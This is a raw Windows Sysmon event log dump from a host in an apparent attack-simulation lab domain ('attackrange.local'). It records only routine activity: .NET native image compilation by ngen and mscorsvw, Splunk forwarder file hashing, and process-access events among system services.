21:00:49.035{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018586Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:49.004{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018585Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:49.004{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:50.773{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EDBB3A76A414B1743CFB797AE29AD07,SHA256=CE0DF58307D5CE4D94F7AC0C9A7ECDAF6697636CBF37E7028379143406190E5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.775{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=98545893EEE27FE848971B20B4E59690,SHA256=A3615C478C3D480CE408EEB059321D4122294E6451C46DB9C0B18D6E53056555,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.382{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.367{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:51.367{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.257{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A103-60D3-4E02-00000000CF01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.242{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A103-60D3-4E02-00000000CF01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.242{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A103-60D3-4E02-00000000CF01}3288C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL
+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.148{4DB9351A-A101-60D3-4D02-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YNJ5Y7CR6Q\System.Data.Services.ni.dll.auxMD5=628794C4BA7C0332A79627521E7770FF,SHA256=298A377CAB1149A4C5951216FE43079AB9BE75225D12035097981768370ABF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:51.148{4DB9351A-A101-60D3-4D02-00000000CF01}6736NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\YNJ5Y7CR6Q\System.Data.Services.ni.dllMD5=0225BB103AF450817FA0687A90E5A6AA,SHA256=CE4E6F3E72ECC35AC039BF4851176D0BD50D5B464DDFB1E71F37D2898A5B5936,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:51.070{4DB9351A-A101-60D3-4D02-00000000CF01}6736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1a50-0\System.Data.Services.dll2021-06-23 21:00:51.070 10341000x800000000000000018616Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:52.997{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A104-60D3-5002-00000000CF01}3140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018615Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.966{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A104-60D3-5002-00000000CF01}3140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018614Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:52.966{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A104-60D3-5002-00000000CF01}3140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.900{4DB9351A-A103-60D3-4F02-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2XX8TX0L53\System.Data.Services.Client.ni.dll.auxMD5=80C12FF623F435CCE201475529881E66,SHA256=4AE338683CED4CA6481991CB55B56BB8474103956E0363D22D9B8194F0E07859,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000018612Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.899{4DB9351A-A103-60D3-4F02-00000000CF01}5828NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\2XX8TX0L53\System.Data.Services.Client.ni.dllMD5=090BD3E6F0B259F7B8F40DDE8E399EC4,SHA256=BDC81D5D3794EBAE332F10E7F900D52F34700853CB583AC31A66DFA58D893347,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018611Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:00:52.850{4DB9351A-A103-60D3-4F02-00000000CF01}5828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\16c4-0\System.Data.Services.Client.dll2021-06-23 21:00:52.850 23542300x800000000000000018610Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.782{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4727AF1CE8735CBE554ACFC1CCAF232,SHA256=31A4029E13D74206A7A05C309FF4A28E8202A277CD6A8BB251624039B7A0E566,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018609Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:52.275{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F919D971E9800840397957901801919,SHA256=22FAD660063B10354D2C0B653EEDB426EB87FFE19FC302CBEB5E1342AD473948,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.942{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBF0BA121FD5E6B8B9C1D6C2145AA5DE,SHA256=EB3FD89E7C480391C5B9D99225C93EB4154A3157C687987D972EDDC3658C2B5E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018634Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018633Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018632Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:53.755{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018631Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018630Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.755{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000018629Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.756{4DB9351A-A105-60D3-5302-00000000CF01}3936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018628Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:00:53.512{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A105-60D3-5202-00000000CF01}2680C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018627Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:00:53.497{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program 